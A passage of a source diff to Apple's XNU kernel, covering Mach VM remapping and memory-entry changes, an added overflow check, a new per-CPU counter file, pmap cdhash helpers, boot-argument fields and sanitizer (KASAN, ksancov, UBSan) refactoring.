+ */ +kern_return_t +vm_remap_new_external( + vm_map_t target_map, + vm_offset_t *address, + vm_size_t size, + vm_offset_t mask, + int flags, + mach_port_t src_tport, + vm_offset_t memory_address, + boolean_t copy, + vm_prot_t *cur_protection, /* IN/OUT */ + vm_prot_t *max_protection, /* IN/OUT */ + vm_inherit_t inheritance) +{ + vm_tag_t tag; + vm_map_offset_t map_addr; + kern_return_t kr; + vm_map_t src_map; + + flags |= VM_FLAGS_RETURN_DATA_ADDR; + VM_GET_FLAGS_ALIAS(flags, tag); + + /* filter out any kernel-only flags */ + if (flags & ~VM_FLAGS_USER_REMAP) { + return KERN_INVALID_ARGUMENT; + } + + if (target_map == VM_MAP_NULL) { + return KERN_INVALID_ARGUMENT; + } + + if ((*cur_protection & ~VM_PROT_ALL) || + (*max_protection & ~VM_PROT_ALL) || + (*cur_protection & *max_protection) != *cur_protection) { + return KERN_INVALID_ARGUMENT; + } + if ((*max_protection & (VM_PROT_WRITE | VM_PROT_EXECUTE)) == + (VM_PROT_WRITE | VM_PROT_EXECUTE)) { + /* + * XXX FBDP TODO + * enforce target's "wx" policies + */ + return KERN_PROTECTION_FAILURE; + } + + if (copy || *max_protection == VM_PROT_READ || *max_protection == VM_PROT_NONE) { + src_map = convert_port_to_map_read(src_tport); + } else { + src_map = convert_port_to_map(src_tport); + } + + if (src_map == VM_MAP_NULL) { + return KERN_INVALID_ARGUMENT; + } + + map_addr = (vm_map_offset_t)*address; + + kr = vm_map_remap(target_map, + &map_addr, + size, + mask, + flags, + VM_MAP_KERNEL_FLAGS_NONE, + tag, + src_map, + memory_address, + copy, + cur_protection, /* IN/OUT */ + max_protection, /* IN/OUT */ + inheritance); + + *address = CAST_DOWN(vm_offset_t, map_addr); + vm_map_deallocate(src_map); + + if (kr == KERN_SUCCESS) { + ipc_port_release_send(src_tport); /* consume on success */ + } + return kr; +} + /* * vm_remap - * Remap a range of memory from one task into another, @@ -1279,8 +1452,8 @@ vm_remap_external( vm_map_t src_map, vm_offset_t memory_address, boolean_t copy, - vm_prot_t *cur_protection, - vm_prot_t 
*max_protection, + vm_prot_t *cur_protection, /* OUT */ + vm_prot_t *max_protection, /* OUT */ vm_inherit_t inheritance) { vm_tag_t tag; @@ -1301,8 +1474,8 @@ vm_remap_kernel( vm_map_t src_map, vm_offset_t memory_address, boolean_t copy, - vm_prot_t *cur_protection, - vm_prot_t *max_protection, + vm_prot_t *cur_protection, /* OUT */ + vm_prot_t *max_protection, /* OUT */ vm_inherit_t inheritance) { vm_map_offset_t map_addr; @@ -1319,6 +1492,9 @@ vm_remap_kernel( map_addr = (vm_map_offset_t)*address; + *cur_protection = VM_PROT_NONE; + *max_protection = VM_PROT_NONE; + kr = vm_map_remap(target_map, &map_addr, size, @@ -1329,8 +1505,8 @@ vm_remap_kernel( src_map, memory_address, copy, - cur_protection, - max_protection, + cur_protection, /* IN/OUT */ + max_protection, /* IN/OUT */ inheritance); *address = CAST_DOWN(vm_offset_t, map_addr); return kr; @@ -1375,8 +1551,6 @@ mach_vm_wire_kernel( return KERN_INVALID_HOST; } - assert(host_priv == &realhost); - if (map == VM_MAP_NULL) { return KERN_INVALID_TASK; } @@ -1426,8 +1600,6 @@ vm_wire( return KERN_INVALID_HOST; } - assert(host_priv == &realhost); - if (map == VM_MAP_NULL) { return KERN_INVALID_TASK; } @@ -2099,7 +2271,10 @@ mach_vm_page_range_query( effective_page_size = (1 << effective_page_shift); effective_page_mask = effective_page_size - 1; - disp_buf_req_size = (*dispositions_count * sizeof(int)); + if (os_mul_overflow(*dispositions_count, sizeof(int), &disp_buf_req_size)) { + return KERN_INVALID_ARGUMENT; + } + start = vm_map_trunc_page(address, effective_page_mask); end = vm_map_round_page(address + size, effective_page_mask); @@ -2296,7 +2471,7 @@ kern_return_t mach_make_memory_entry_64( vm_map_t target_map, memory_object_size_t *size, - memory_object_offset_t offset, + memory_object_offset_t offset, vm_prot_t permission, ipc_port_t *object_handle, ipc_port_t parent_handle) @@ -2674,7 +2849,6 @@ mach_make_memory_entry_internal( vm_prot_t cur_prot, max_prot; vm_map_kernel_flags_t vmk_flags; vm_map_entry_t 
parent_copy_entry; - vm_prot_t required_protection; if (target_map == VM_MAP_NULL) { DEBUG4K_MEMENTRY("map %p offset 0x%llx size 0x%llx prot 0x%x -> entry %p kr 0x%x\n", target_map, offset, *size, permission, user_entry, KERN_INVALID_TASK); @@ -2685,6 +2859,42 @@ mach_make_memory_entry_internal( vmk_flags = VM_MAP_KERNEL_FLAGS_NONE; parent_copy_entry = VM_MAP_ENTRY_NULL; if (!(permission & MAP_MEM_VM_SHARE)) { + vm_map_t tmp_map, real_map; + vm_map_version_t version; + vm_object_t tmp_object; + vm_object_offset_t obj_off; + vm_prot_t prot; + boolean_t wired; + bool contended; + + /* resolve any pending submap copy-on-write... */ + if (protections & VM_PROT_WRITE) { + tmp_map = target_map; + vm_map_lock_read(tmp_map); + kr = vm_map_lookup_locked(&tmp_map, + map_start, + protections | mask_protections, + OBJECT_LOCK_EXCLUSIVE, + &version, + &tmp_object, + &obj_off, + &prot, + &wired, + NULL, /* fault_info */ + &real_map, + &contended); + if (kr != KERN_SUCCESS) { + vm_map_unlock_read(tmp_map); + } else { + vm_object_unlock(tmp_object); + vm_map_unlock_read(tmp_map); + if (real_map != tmp_map) { + vm_map_unlock_read(real_map); + } + } + } + /* ... and carry on */ + /* stop extracting if VM object changes */ vmk_flags.vmkf_copy_single_object = TRUE; if ((permission & MAP_MEM_NAMED_REUSE) && @@ -2718,15 +2928,16 @@ mach_make_memory_entry_internal( * caller is asking for whichever proctections are * available: no required protections. */ - required_protection = VM_PROT_NONE; + cur_prot = VM_PROT_NONE; + max_prot = VM_PROT_NONE; } else { /* * Caller wants a memory entry with "protections". * Make sure we extract only memory that matches that. 
*/ - required_protection = protections; + cur_prot = protections; + max_prot = protections; } - cur_prot = VM_PROT_ALL; if (target_map->pmap == kernel_pmap) { /* * Get "reserved" map entries to avoid deadlocking @@ -2743,7 +2954,6 @@ mach_make_memory_entry_internal( kr = vm_map_copy_extract(target_map, map_start, map_size, - required_protection, FALSE, /* copy */ &copy, &cur_prot, @@ -2758,7 +2968,6 @@ mach_make_memory_entry_internal( return kr; } assert(copy != VM_MAP_COPY_NULL); - assert((cur_prot & required_protection) == required_protection); if (mask_protections) { /* @@ -2780,6 +2989,9 @@ mach_make_memory_entry_internal( * We want exactly "original_protections" * out of "cur_prot". */ + assert((cur_prot & protections) == protections); + assert((max_prot & protections) == protections); + /* XXX FBDP TODO: no longer needed? */ if ((cur_prot & protections) != protections) { if (VM_MAP_PAGE_SHIFT(target_map) < PAGE_SHIFT) { // panic("DEBUG4K %s:%d kr 0x%x\n", __FUNCTION__, __LINE__, KERN_PROTECTION_FAILURE); @@ -2948,10 +3160,8 @@ mach_make_memory_entry_internal( if (parent_entry->is_sub_map) { vm_map_t map = parent_entry->backing.map; + vm_map_reference(map); user_entry->backing.map = map; - lck_mtx_lock(&map->s_lock); - os_ref_retain_locked(&map->map_refcnt); - lck_mtx_unlock(&map->s_lock); } else { object = vm_named_entry_to_vm_object(parent_entry); assert(object != VM_OBJECT_NULL); @@ -3516,7 +3726,7 @@ mach_memory_entry_phys_page_offset( return KERN_INVALID_ARGUMENT; } - mem_entry = (vm_named_entry_t) entry_port->ip_kobject; + mem_entry = (vm_named_entry_t) ipc_kobject_get(entry_port); named_entry_lock(mem_entry); @@ -3562,7 +3772,7 @@ mach_memory_entry_map_size( return KERN_INVALID_ARGUMENT; } - mem_entry = (vm_named_entry_t) entry_port->ip_kobject; + mem_entry = (vm_named_entry_t) ipc_kobject_get(entry_port); named_entry_lock(mem_entry); if (mem_entry->is_sub_map) { @@ -4234,8 +4444,8 @@ mach_vm_remap( vm_map_t src_map, mach_vm_offset_t memory_address, 
boolean_t copy, - vm_prot_t *cur_protection, - vm_prot_t *max_protection, + vm_prot_t *cur_protection, /* OUT */ + vm_prot_t *max_protection, /* OUT */ vm_inherit_t inheritance) { return mach_vm_remap_external(target_map, address, size, mask, flags, src_map, memory_address, diff --git a/osfmk/x86_64/copyio.c b/osfmk/x86_64/copyio.c index 9569ed36c..c262c4067 100644 --- a/osfmk/x86_64/copyio.c +++ b/osfmk/x86_64/copyio.c @@ -206,7 +206,7 @@ copyio(int copy_type, user_addr_t user_addr, char *kernel_addr, * Size of elements in the permanent zone is not saved as a part of the * zone's info */ - if (__improbable(src_zone && !src_zone->permanent && + if (__improbable(src_zone && !src_zone->z_permanent && kernel_buf_size < nbytes)) { panic("copyio: kernel buffer %p has size %lu < nbytes %lu", kernel_addr, kernel_buf_size, nbytes); } diff --git a/osfmk/x86_64/counter.c b/osfmk/x86_64/counter.c new file mode 100644 index 000000000..421102406 --- /dev/null +++ b/osfmk/x86_64/counter.c @@ -0,0 +1,109 @@ +/* * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. 
+ * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ +/* + * @OSF_COPYRIGHT@ + */ +/* + * Mach Operating System + * Copyright (c) 1991,1990,1989,1988,1987 Carnegie Mellon University + * All Rights Reserved. + * + * Permission to use, copy, modify and distribute this software and its + * documentation is hereby granted, provided that both the copyright + * notice and this permission notice appear in all copies of the + * software, derivative works or modified versions, and any portions + * thereof, and that both notices appear in supporting documentation. + * + * CARNEGIE MELLON ALLOWS FREE USE OF THIS SOFTWARE IN ITS "AS IS" + * CONDITION. CARNEGIE MELLON DISCLAIMS ANY LIABILITY OF ANY KIND FOR + * ANY DAMAGES WHATSOEVER RESULTING FROM THE USE OF THIS SOFTWARE. + * + * Carnegie Mellon requests users of this software to return to + * + * Software Distribution Coordinator or Software.Distribution@CS.CMU.EDU + * School of Computer Science + * Carnegie Mellon University + * Pittsburgh PA 15213-3890 + * + * any improvements or extensions that they make and grant Carnegie Mellon + * the rights to redistribute these changes. 
+ */ +#include +#include +#include +#include +#include +#include +#include + +OS_OVERLOADABLE +void +counter_add(scalable_counter_t *counter, uint64_t amount) +{ + disable_preemption(); + (*zpercpu_get(*counter)) += amount; + enable_preemption(); +} + +OS_OVERLOADABLE +void +counter_inc(scalable_counter_t *counter) +{ + disable_preemption(); + (*zpercpu_get(*counter))++; + enable_preemption(); +} + +OS_OVERLOADABLE +void +counter_dec(scalable_counter_t *counter) +{ + disable_preemption(); + (*zpercpu_get(*counter))--; + enable_preemption(); +} + +OS_OVERLOADABLE +void +counter_add_preemption_disabled(scalable_counter_t *counter, uint64_t amount) +{ + (*zpercpu_get(*counter)) += amount; +} + +OS_OVERLOADABLE +void +counter_inc_preemption_disabled(scalable_counter_t *counter) +{ + (*zpercpu_get(*counter))++; +} + +OS_OVERLOADABLE +void +counter_dec_preemption_disabled(scalable_counter_t *counter) +{ + (*zpercpu_get(*counter))--; +} diff --git a/osfmk/x86_64/pmap.c b/osfmk/x86_64/pmap.c index 79ad35a0e..aa370791b 100644 --- a/osfmk/x86_64/pmap.c +++ b/osfmk/x86_64/pmap.c @@ -3275,6 +3275,41 @@ pmap_lookup_in_static_trust_cache(const uint8_t __unused cdhash[20]) return false; } +SIMPLE_LOCK_DECLARE(pmap_compilation_service_cdhash_lock, 0); +uint8_t pmap_compilation_service_cdhash[CS_CDHASH_LEN] = { 0 }; + +void +pmap_set_compilation_service_cdhash(const uint8_t cdhash[CS_CDHASH_LEN]) +{ + simple_lock(&pmap_compilation_service_cdhash_lock, LCK_GRP_NULL); + memcpy(pmap_compilation_service_cdhash, cdhash, CS_CDHASH_LEN); + simple_unlock(&pmap_compilation_service_cdhash_lock); + +#if DEVELOPMENT || DEBUG + printf("Added Compilation Service CDHash through the PMAP: 0x%02X 0x%02X 0x%02X 0x%02X\n", cdhash[0], cdhash[1], cdhash[2], cdhash[3]); +#endif +} + +bool +pmap_match_compilation_service_cdhash(const uint8_t cdhash[CS_CDHASH_LEN]) +{ + bool match = false; + + simple_lock(&pmap_compilation_service_cdhash_lock, LCK_GRP_NULL); + if (bcmp(pmap_compilation_service_cdhash, 
cdhash, CS_CDHASH_LEN) == 0) { + match = true; + } + simple_unlock(&pmap_compilation_service_cdhash_lock); + +#if DEVELOPMENT || DEBUG + if (match) { + printf("Matched Compilation Service CDHash through the PMAP\n"); + } +#endif + + return match; +} + bool pmap_in_ppl(void) { @@ -3307,3 +3342,26 @@ pmap_free_reserved_ppl_page(void __unused *kva) { // Unsupported on this architecture. } + +#if DEVELOPMENT || DEBUG +/* + * Used for unit testing recovery from text corruptions. + */ +kern_return_t +pmap_test_text_corruption(pmap_paddr_t pa) +{ + int pai; + uint8_t *va; + + pai = ppn_to_pai(atop(pa)); + if (!IS_MANAGED_PAGE(pai)) { + return KERN_FAILURE; + } + + va = (uint8_t *)PHYSMAP_PTOV(pa); + va[0] = 0x0f; /* opcode for UD2 */ + va[1] = 0x0b; + + return KERN_SUCCESS; +} +#endif /* DEVELOPMENT || DEBUG */ diff --git a/pexpert/arm/pe_identify_machine.c b/pexpert/arm/pe_identify_machine.c index 1ddd6fc65..b3b867632 100644 --- a/pexpert/arm/pe_identify_machine.c +++ b/pexpert/arm/pe_identify_machine.c @@ -407,7 +407,7 @@ pe_run_debug_command(command_buffer_element_t *command_buffer) nanoseconds_to_absolutetime(command_buffer->delay_us * NSEC_PER_USEC, &deadline); deadline += ml_get_timebase(); while (ml_get_timebase() < deadline) { - ; + os_compiler_barrier(); } } } diff --git a/pexpert/arm/pe_init.c b/pexpert/arm/pe_init.c index 8ff54da6c..2934d4da8 100644 --- a/pexpert/arm/pe_init.c +++ b/pexpert/arm/pe_init.c @@ -394,7 +394,10 @@ PE_init_platform(boolean_t vm_initialized, void *args) PE_state.video.v_width = boot_args_ptr->Video.v_width; PE_state.video.v_height = boot_args_ptr->Video.v_height; PE_state.video.v_depth = (boot_args_ptr->Video.v_depth >> kBootVideoDepthDepthShift) & kBootVideoDepthMask; - PE_state.video.v_rotate = (boot_args_ptr->Video.v_depth >> kBootVideoDepthRotateShift) & kBootVideoDepthMask; + PE_state.video.v_rotate = ( + ((boot_args_ptr->Video.v_depth >> kBootVideoDepthRotateShift) & kBootVideoDepthMask) + // rotation + 
((boot_args_ptr->Video.v_depth >> kBootVideoDepthBootRotateShift) & kBootVideoDepthMask) // add extra boot rotation + ) % 4; PE_state.video.v_scale = ((boot_args_ptr->Video.v_depth >> kBootVideoDepthScaleShift) & kBootVideoDepthMask) + 1; PE_state.video.v_display = boot_args_ptr->Video.v_display; strlcpy(PE_state.video.v_pixelFormat, "BBBBBBBBGGGGGGGGRRRRRRRR", sizeof(PE_state.video.v_pixelFormat)); diff --git a/pexpert/arm/pe_serial.c b/pexpert/arm/pe_serial.c index b555aa1e2..cf8dab9fb 100644 --- a/pexpert/arm/pe_serial.c +++ b/pexpert/arm/pe_serial.c @@ -629,8 +629,8 @@ SECURITY_READ_ONLY_LATE(static struct pe_serial_functions) dockchannel_uart_seri /****************************************************************************/ #ifdef PI3_UART -vm_offset_t pi3_gpio_base_vaddr = 0; -vm_offset_t pi3_aux_base_vaddr = 0; +static vm_offset_t pi3_gpio_base_vaddr = 0; +static vm_offset_t pi3_aux_base_vaddr = 0; static int pi3_uart_tr0(void) { @@ -716,6 +716,10 @@ SECURITY_READ_ONLY_LATE(static struct pe_serial_functions) pi3_uart_serial_funct }; #endif /* PI3_UART */ + +/*****************************************************************************/ + + /*****************************************************************************/ static void @@ -778,6 +782,7 @@ serial_init(void) } #endif /* PI3_UART */ + #ifdef DOCKCHANNEL_UART uint32_t no_dockchannel_uart = 0; if (SecureDTFindEntry("name", "dockchannel-uart", &entryP) == kSuccess) { diff --git a/pexpert/pexpert/arm/boot.h b/pexpert/pexpert/arm/boot.h index 9a9c31361..f5a82bb19 100644 --- a/pexpert/pexpert/arm/boot.h +++ b/pexpert/pexpert/arm/boot.h @@ -30,6 +30,7 @@ struct Boot_Video { #define kBootVideoDepthDepthShift (0) #define kBootVideoDepthRotateShift (8) #define kBootVideoDepthScaleShift (16) +#define kBootVideoDepthBootRotateShift (24) #define kBootFlagsDarkBoot (1 << 0) diff --git a/pexpert/pexpert/arm64/apple_arm64_regs.h b/pexpert/pexpert/arm64/apple_arm64_regs.h index 270255667..ade05dc8e 100644 --- 
a/pexpert/pexpert/arm64/apple_arm64_regs.h +++ b/pexpert/pexpert/arm64/apple_arm64_regs.h @@ -14,7 +14,6 @@ #ifdef APPLE_ARM64_ARCH_FAMILY -#define ARM64_REG_HID0 S3_0_c15_c0_0 #define ARM64_REG_HID0_LoopBuffDisb (1<<20) #define ARM64_REG_HID0_AMXCacheFusionDisb (1ULL<<21) #define ARM64_REG_HID0_ICPrefLimitOneBrn (1<<25) @@ -26,10 +25,8 @@ #define ARM64_REG_HID0_ICPrefDepth_bmsk (7ULL < #include +#undef HAS_SIQ #define MAX_L2_CLINE 7 #define MAX_CPUS 8 @@ -235,6 +230,7 @@ #define CORE_NCTRS 8 /* Placeholder; KPC is not enabled for this target */ #endif /* ARM64_BOARD_CONFIG_BCM2837 */ + #ifndef HAS_UNCORE_CTRS #undef UNCORE_VERSION #undef UNCORE_PER_CLUSTER diff --git a/pexpert/pexpert/arm64/boot.h b/pexpert/pexpert/arm64/boot.h index 1bcf4990e..f43d16e4b 100644 --- a/pexpert/pexpert/arm64/boot.h +++ b/pexpert/pexpert/arm64/boot.h @@ -42,6 +42,7 @@ struct Boot_Video { #define kBootVideoDepthDepthShift (0) #define kBootVideoDepthRotateShift (8) #define kBootVideoDepthScaleShift (16) +#define kBootVideoDepthBootRotateShift (24) #define kBootFlagsDarkBoot (1ULL << 0) diff --git a/pexpert/pexpert/i386/boot.h b/pexpert/pexpert/i386/boot.h index de2f95e8d..7486640e7 100644 --- a/pexpert/pexpert/i386/boot.h +++ b/pexpert/pexpert/i386/boot.h @@ -202,14 +202,20 @@ typedef struct boot_args { /* Version 2, Revision 1 */ uint64_t KC_hdrs_vaddr; - uint64_t arvRootHashStart; /* Physical address of root hash file */ + uint64_t arvRootHashStart; /* Physical address of system volume root hash file */ uint64_t arvRootHashSize; - uint64_t arvManifestStart; /* Physical address of manifest file */ + uint64_t arvManifestStart; /* Physical address of system volume manifest file */ uint64_t arvManifestSize; + uint64_t bsARVRootHashStart;/* Physical address of base system root hash file */ + uint64_t bsARVRootHashSize; + + uint64_t bsARVManifestStart;/* Physical address of base system manifest file */ + uint64_t bsARVManifestSize; + /* Reserved */ - uint32_t __reserved4[700]; + uint32_t 
__reserved4[692]; } boot_args; extern char assert_boot_args_size_is_4096[sizeof(boot_args) == 4096 ? 1 : -1]; diff --git a/san/Kasan_kasan.exports b/san/Kasan_kasan.exports index 72f916f33..4f0c5a53f 100644 --- a/san/Kasan_kasan.exports +++ b/san/Kasan_kasan.exports @@ -139,12 +139,12 @@ ___ubsan_handle_negate_overflow ___ubsan_handle_negate_overflow_abort ___ubsan_handle_nonnull_arg ___ubsan_handle_nonnull_arg_abort -___ubsan_handle_nonnull_return -___ubsan_handle_nonnull_return_abort +___ubsan_handle_nonnull_return_v1 +___ubsan_handle_nonnull_return_v1_abort ___ubsan_handle_nullability_arg ___ubsan_handle_nullability_arg_abort -___ubsan_handle_nullability_return -___ubsan_handle_nullability_return_abort +___ubsan_handle_nullability_return_v1 +___ubsan_handle_nullability_return_v1_abort ___ubsan_handle_out_of_bounds ___ubsan_handle_out_of_bounds_abort ___ubsan_handle_pointer_overflow diff --git a/san/kasan-blacklist b/san/kasan-blacklist index 00c42c778..9d7a97047 100644 --- a/san/kasan-blacklist +++ b/san/kasan-blacklist @@ -46,5 +46,4 @@ fun:_ZL18IOTrackingLeakScanPv # Exclude KASAN dependencies # XXX: could this be relaxed since fakestack is reentrant? 
src:./osfmk/kern/zalloc.c -src:./osfmk/kern/zcache.c diff --git a/san/kasan-fakestack.c b/san/kasan-fakestack.c index 9f45135d6..b865b7ff2 100644 --- a/san/kasan-fakestack.c +++ b/san/kasan-fakestack.c @@ -282,11 +282,12 @@ kasan_init_fakestack(void) snprintf(fakestack_names[i], 16, "fakestack.%d", i); fakestack_zones[i] = zone_create_ext(fakestack_names[i], sz, - ZC_NOCALLOUT | ZC_NOGC | ZC_KASAN_NOREDZONE | ZC_KASAN_NOQUARANTINE, + ZC_NOCALLOUT | ZC_NOGC | ZC_NOCACHING | + ZC_KASAN_NOREDZONE | ZC_KASAN_NOQUARANTINE, ZONE_ID_ANY, ^(zone_t z) { - zone_set_exhaustible(z, maxsz); + zone_set_exhaustible(z, maxsz / sz); }); - zfill(fakestack_zones[i], (int)maxsz / sz); + zone_fill_initially(fakestack_zones[i], maxsz / sz); } /* globally enable */ diff --git a/san/ksancov.c b/san/ksancov.c index 762d69da8..975a5fc2c 100644 --- a/san/ksancov.c +++ b/san/ksancov.c @@ -106,7 +106,7 @@ static uint32_t __unused npcs = 0; static _Atomic unsigned active_devs; static LCK_GRP_DECLARE(ksancov_lck_grp, "ksancov_lck_grp"); -static lck_rw_t *ksancov_devs_lck; +static LCK_RW_DECLARE(ksancov_devs_lck, &ksancov_lck_grp); /* array of devices indexed by devnode minor */ static ksancov_dev_t ksancov_devs[KSANCOV_MAX_DEV]; @@ -386,21 +386,21 @@ ksancov_open(dev_t dev, int flags, int devtype, proc_t p) return EBUSY; } - lck_rw_lock_exclusive(ksancov_devs_lck); + lck_rw_lock_exclusive(&ksancov_devs_lck); if (ksancov_devs[minor_num]) { - lck_rw_unlock_exclusive(ksancov_devs_lck); + lck_rw_unlock_exclusive(&ksancov_devs_lck); return EBUSY; } ksancov_dev_t d = create_dev(dev); if (!d) { - lck_rw_unlock_exclusive(ksancov_devs_lck); + lck_rw_unlock_exclusive(&ksancov_devs_lck); return ENOMEM; } ksancov_devs[minor_num] = d; - lck_rw_unlock_exclusive(ksancov_devs_lck); + lck_rw_unlock_exclusive(&ksancov_devs_lck); return 0; } @@ -531,6 +531,9 @@ ksancov_detach(ksancov_dev_t d) thread_wait(d->thread, TRUE); } + assert(active_devs >= 1); + os_atomic_sub(&active_devs, 1, relaxed); + /* drop our thread 
reference */ thread_deallocate(d->thread); d->thread = THREAD_NULL; @@ -542,10 +545,10 @@ ksancov_close(dev_t dev, int flags, int devtype, proc_t p) #pragma unused(flags,devtype,p) const int minor_num = minor(dev); - lck_rw_lock_exclusive(ksancov_devs_lck); + lck_rw_lock_exclusive(&ksancov_devs_lck); ksancov_dev_t d = ksancov_devs[minor_num]; ksancov_devs[minor_num] = NULL; /* dev no longer discoverable */ - lck_rw_unlock_exclusive(ksancov_devs_lck); + lck_rw_unlock_exclusive(&ksancov_devs_lck); /* * No need to lock d here as there is and will be no one having its @@ -558,10 +561,8 @@ ksancov_close(dev_t dev, int flags, int devtype, proc_t p) } if (d->mode == KS_MODE_TRACE && d->trace) { - os_atomic_sub(&active_devs, 1, relaxed); os_atomic_store(&d->trace->enabled, 0, relaxed); /* stop tracing */ } else if (d->mode == KS_MODE_COUNTERS && d->counters) { - os_atomic_sub(&active_devs, 1, relaxed); os_atomic_store(&d->counters->enabled, 0, relaxed); /* stop tracing */ } @@ -620,10 +621,10 @@ ksancov_ioctl(dev_t dev, unsigned long cmd, caddr_t _data, int fflag, proc_t p) struct ksancov_buf_desc *mcmd; void *data = (void *)_data; - lck_rw_lock_shared(ksancov_devs_lck); + lck_rw_lock_shared(&ksancov_devs_lck); ksancov_dev_t d = ksancov_devs[minor(dev)]; if (!d) { - lck_rw_unlock_shared(ksancov_devs_lck); + lck_rw_unlock_shared(&ksancov_devs_lck); return EINVAL; /* dev not open */ } @@ -666,7 +667,7 @@ ksancov_ioctl(dev_t dev, unsigned long cmd, caddr_t _data, int fflag, proc_t p) break; } - lck_rw_unlock_shared(ksancov_devs_lck); + lck_rw_unlock_shared(&ksancov_devs_lck); return ret; } @@ -736,7 +737,5 @@ ksancov_init_dev(void) ksancov_edgemap->nedges = (uint32_t)nedges; ksancov_edgemap->offset = KSANCOV_PC_OFFSET; - ksancov_devs_lck = lck_rw_alloc_init(&ksancov_lck_grp, LCK_ATTR_NULL); - return 0; } diff --git a/san/memintrinsics.h b/san/memintrinsics.h index 0c0a11ece..a40ce58a3 100644 --- a/san/memintrinsics.h +++ b/san/memintrinsics.h @@ -1,5 +1,5 @@ /* - * Copyright 
(c) 2016 Apple Inc. All rights reserved. + * Copyright (c) 2016-2020 Apple Inc. All rights reserved. * * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * @@ -75,7 +75,14 @@ __nosan_strlcpy(char *dst, const char *src, size_t sz) static inline char * __nosan_strncpy(char *dst, const char *src, size_t sz) { +#ifdef __clang__ +#pragma clang diagnostic push +#pragma clang diagnostic ignored "-Wdeprecated-declarations" +#endif return strncpy(dst, src, sz); +#ifdef __clang__ +#pragma clang diagnostic pop +#endif } static inline size_t __nosan_strlcat(char *dst, const char *src, size_t sz) @@ -85,7 +92,14 @@ __nosan_strlcat(char *dst, const char *src, size_t sz) static inline char * __nosan_strncat(char *dst, const char *src, size_t sz) { +#ifdef __clang__ +#pragma clang diagnostic push +#pragma clang diagnostic ignored "-Wdeprecated-declarations" +#endif return strncat(dst, src, sz); +#ifdef __clang__ +#pragma clang diagnostic pop +#endif } static inline size_t __nosan_strnlen(const char *src, size_t sz) diff --git a/san/ubsan.c b/san/ubsan.c index d8e42d708..d245d424c 100644 --- a/san/ubsan.c +++ b/san/ubsan.c @@ -28,6 +28,7 @@ #include #include +#include #include #include "ubsan.h" @@ -35,14 +36,27 @@ static const bool ubsan_print = false; static const uint32_t line_acquired = 0x80000000UL; static const char *get_type_check_kind(uint8_t kind); -static size_t -format_loc(struct san_src_loc *loc, char *dst, size_t sz) +static void +ubsan_buf_log(struct ubsan_buf *ub, const char *fmt, ...) 
{ - return scnprintf(dst, sz, ", file:\"%s\", line:%d, column:%d },\n", - loc->filename, - loc->line & ~line_acquired, - loc->col - ); + va_list ap; + + va_start(ap, fmt); + int n = vscnprintf(ub->ub_buf + ub->ub_logged, ub->ub_buf_size - ub->ub_logged, fmt, ap); + va_end(ap); + + ub->ub_logged += n; + assert(ub->ub_logged <= ub->ub_buf_size); +} + +static void +ubsan_buf_log_loc(struct ubsan_buf *ub, const char *desc, struct san_src_loc *loc) +{ + ubsan_buf_log(ub, "%s:{ file:\"%s\", line:%d, column:%d }", + desc, + loc->filename, + loc->line & ~line_acquired, + loc->col); } /* @@ -70,33 +84,30 @@ overflow_str[] = { NULL }; -static size_t -format_overflow(struct ubsan_violation *v, char *buf, size_t sz) +static void +format_overflow(struct ubsan_violation *v, struct ubsan_buf *ub) { struct san_type_desc *ty = v->overflow->ty; - return scnprintf(buf, sz, - "problem:\"%s overflow\", op:\"%s\", ty:\"%s\", width:%d, lhs:0x%llx, rhs:0x%llx, ", - ty->issigned ? "signed" : "unsigned", - overflow_str[v->ubsan_type], - ty->name, - 1 << ty->width, - v->lhs, - v->rhs - ); + ubsan_buf_log(ub, + "problem:\"%s overflow\", op:\"%s\", ty:\"%s\", width:%d, lhs:0x%llx, rhs:0x%llx", + ty->issigned ? 
"signed" : "unsigned", + overflow_str[v->ubsan_type], + ty->name, + 1 << ty->width, + v->lhs, + v->rhs + ); } -static size_t -format_shift(struct ubsan_violation *v, char *buf, size_t sz) +static void +format_shift(struct ubsan_violation *v, struct ubsan_buf *ub) { - size_t n = 0; struct san_type_desc *l = v->shift->lhs_t; struct san_type_desc *r = v->shift->rhs_t; - n += scnprintf(buf + n, sz - n, "problem:\"bad shift\", "); - n += scnprintf(buf + n, sz - n, "lhs:0x%llx, lty:\"%s\", lsigned:%d, lwidth:%d, ", v->lhs, l->name, l->issigned, 1 << l->width); - n += scnprintf(buf + n, sz - n, "rhs:0x%llx, rty:\"%s\", rsigned:%d, rwidth:%d, ", v->rhs, r->name, r->issigned, 1 << r->width); - - return n; + ubsan_buf_log(ub, "problem:\"bad shift\", "); + ubsan_buf_log(ub, "lhs:0x%llx, lty:\"%s\", lsigned:%d, lwidth:%d, ", v->lhs, l->name, l->issigned, 1 << l->width); + ubsan_buf_log(ub, "rhs:0x%llx, rty:\"%s\", rsigned:%d, rwidth:%d", v->rhs, r->name, r->issigned, 1 << r->width); } static const char * const @@ -114,89 +125,196 @@ get_type_check_kind(uint8_t kind) : "some"; } -static size_t -format_type_mismatch(struct ubsan_violation *v, char *buf, size_t sz) +static void +format_type_mismatch(struct ubsan_violation *v, struct ubsan_buf *ub) { - size_t n = 0; size_t alignment = 1 << v->align->align; void *ptr = (void*)v->lhs; - const char * kind = get_type_check_kind(v->align->kind); + const char *kind = get_type_check_kind(v->align->kind); + if (NULL == ptr) { //null pointer use - n += scnprintf(buf + n, sz - n, "problem:\"%s NULL pointer\", ty:\"%s\", ", kind, v->align->ty->name); + ubsan_buf_log(ub, "problem:\"%s NULL pointer\", ty:\"%s\"", kind, v->align->ty->name); } else if (alignment && 